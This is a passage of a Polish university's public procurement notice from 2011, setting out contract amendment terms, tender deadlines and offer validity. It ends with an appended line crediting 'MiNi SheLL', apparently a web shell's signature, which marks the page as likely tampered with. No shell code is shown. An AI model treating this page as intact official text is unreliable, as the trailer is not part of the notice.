e)	wydłużenia czasu oczekiwania na uzyskanie pozwoleń lub decyzji administracyjnych 
i uzgodnień wymaganych dla wykonania umowy, jeżeli łączny czas oczekiwania na pozwolenia i decyzje administracyjne przekroczy łącznie 21 dni.
W przedstawionych powyżej przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji, z tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. W przypadku zmiany terminu wykonania przedmiotu umowy, Wykonawca zobowiązany jest do przedłużenia terminu ważności zabezpieczenia należytego wykonania umowy.
Zamawiający dopuszcza możliwość zmiany w zakresie przedmiotu umowy, w przypadku stwierdzenia konieczności wykonania robót zamiennych lub dodatkowych (niekoniecznych). Informacja o konieczności wykonania ww. robót potwierdzona być musi w protokole robót zamiennych/dodatkowych, zatwierdzonym pisemnie przez Zamawiającego.
Określona w umowie  cena ryczałtowa, może zostać podwyższona wyłącznie w przypadku zlecenia robót zamiennych lub dodatkowych (niekoniecznych), zaakceptowanych na piśmie przez Zamawiającego. W takim przypadki wartość robót zamiennych lub dodatkowych (niekoniecznych) zostanie rozliczona na podstawie obmiaru, kosztorysem powykonawczym. Wykonawca nie może żądać podwyższenia ceny, jeżeli wykonał prace dodatkowe (niekonieczne) lub zamienne bez uzyskania pisemnej zgody Zamawiającego.
Zamawiający przewiduje możliwość zmiany umowy w zakresie osób wyznaczonych do kontaktów miedzy stronami, Kierownika budowy podczas realizacji przedmiotowego zamówienia jeżeli nowo wyznaczone osoby posiadać będą kwalifikacje odpowiadające wymaganiom określonym przez Zamawiającego w specyfikacji istotnych warunków zamówienia oraz zaistniałe zmiany będą wywołane okolicznościami, których nie można było przewidzieć w chwili podpisania umowy.
Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych ul. Oczapowskiego 2, Olsztyn 10 - 719, pok. 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2011 godzina 09:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych ul. Oczapowskiego 2, Olsztyn 10 - 719, pok. 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com